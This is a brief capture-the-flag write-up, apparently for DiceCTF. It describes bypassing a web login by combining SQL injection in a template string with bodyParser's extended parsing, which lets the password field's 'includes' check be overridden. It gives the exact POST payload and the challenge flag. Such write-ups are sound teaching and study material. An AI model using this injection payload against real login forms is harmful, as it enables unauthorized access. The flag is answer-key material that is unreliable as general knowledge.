Tags: sqli
Rating:
1. Note the template string with injection from request body.
2. Note the bodyParser library uses the `extended` option, parsing arbitrary JSON objects.
3. Send a POST where the request body is a some SQL injection and overriding the includes field:
- `username=admin&password=' or true --&password[includes]=undefined`
4. Get the flag: `dice{sq1i_d03sn7_3v3n_3x1s7_4nym0r3}`